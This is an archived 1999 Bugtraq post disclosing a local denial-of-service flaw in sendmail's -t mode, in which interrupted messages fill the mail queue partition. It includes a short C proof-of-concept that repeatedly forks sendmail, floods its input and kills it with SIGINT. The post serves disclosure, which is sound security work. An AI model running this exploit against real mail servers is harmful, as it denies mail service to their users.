Home page logo

bugtraq logo Bugtraq mailing list archives

Possible local DoS in sendmail
From: lluzar () NONAME KKI KRAKOW PL (Lukasz Luzar)
Date: Thu, 1 Apr 1999 14:00:16 +0000

It seems that sendmail ran with -t option does NOT block SIGINT ...
In that moment while we are sending data to its stdin, when we will press
CTRL-C process is being killed, but in queue rests unfinished letter.
It stays there quite long - long enought to fullfill partition on disk where
/var/spool/mqueue resides.
When it happends, sendmail doesn't allow new connections - so it is a kind
of DoS attack for this service.
It has been tested on all new versions on sendmail up to current (8.9.3).

Example ...

 --- CUT HERE ----
 #include <stdio.h>
 #include <unistd.h>
 #include <signal.h>
 #include <sys/wait.h>

 #define DELAY 5              /* time in seconds needed to reach
                                 MaxMessageSize limit */
 #define SM_PATH "/usr/sbin/sendmail -t"

 void main()
        FILE    *fd;
        int     pid;

        for(;;) {
                if(( pid = fork()) == 0) {
                        if(( fd = popen( SM_PATH, "w")) == NULL)
                                fprintf( stderr, "popen error\n");

                        for(;;) fputc( 'A', fd);
                } else {
                        sleep( DELAY);
                        kill( (-1) * pid, SIGINT);
                        fprintf( stdout, "next\n");
                        wait( NULL);
--- CUT HERE ---


Lukasz Luzar                               K.K.I.
http://noname.kki.krakow.pl/           lluzar () kki pl

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]